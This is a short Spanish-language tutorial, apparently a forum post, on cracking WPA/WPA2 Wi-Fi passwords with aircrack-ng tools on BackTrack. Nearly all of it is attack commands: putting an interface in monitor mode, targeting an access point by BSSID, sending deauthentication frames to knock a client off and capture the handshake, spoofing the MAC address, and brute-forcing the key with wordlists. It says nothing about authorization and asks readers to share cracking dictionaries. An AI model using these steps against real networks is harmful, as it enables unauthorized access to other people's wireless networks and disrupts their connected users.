Tutorial: Como Crackear WPA/WPA2
Bueno, esta tutorial me basare para los que ya saben crackear una wep, así que no me molestare en explicar como crackear una wep en este tutorial. Quedo aclarar que el distro que use no fue nada menos que backtrack.
Empecemos…
1.- checamos cual es nuestra interfase para poderlo en modo monitor:
airmon-ng
2.- como sabemos ponemos nuestra interface en modo monitor:
airmon-ng start
3.- ahora miramos que AP tenemos.
airodump-ng
4.- Como miramos hay una red llamada VIRUS, en este caso que es la mira, y así que atacamos.
airodump-ng –bssid 02:C0:CA:1A:0A:6D -w lir -c 6
5.- Como nos damos cuenta hay un cliente conectado, porque lo mas importante para poder sacar un WPA/WPA2 es que necesitamos que haya alguien conectado, así que hacemos lo siguiente.
aireplay-ng -0 30 -a 02:C0:CA:1A:0A:6D -h 00:1F:3A:55:5A:3A
La mas efectiva es esta:
aireplay-ng -0 30 -a 02:C0:CA:1A:0A:6D -c 00:1F:3A:55:5A:3A
Aclaro devera de hacer este paso devera salir en la ventana de airodump esto; WPA handshake.
6.- Después sacamos la clave.
aircrack-ng -w /root/Diccionarios/Diccionario.dic lir-01.cap
Aclaro que -w ahi va el directorio de tu diccionario.
Ahora si quieres usar el diccionario que tiene el aircrack.ng, ponemos lo siguiente:
aircrack-ng -w password.lst lir-01.cap
7.- ya con todo esto, debemos esperar en sacar la clave, aclaro que este proceso es muy lento y que puede duras días, semanas etc, así que lo único que recomiendo es que tengan un buen diccionario, para poder sacar la clave.
También si alguien tiene buenos diccionarios me gustaria que lo compartieran, para poder usarlo y mirar que tal funcionan.
Los pasos que sigue son estos:
- airmon-ng stop wlan0
- ifconfig wlan0 down
- macchanger –mac 00:11:22:33:44:55 wlan0
- airmon-ng start wlan0
- airodump-ng wlan0
- airodump-ng -c (channel) -w (file name) –bssid (bssid) wlan0
- aireplay-ng -0 5 -a (bssid)wlan0
- aircrack-ng (filename-01.cap)-w (dictionary location)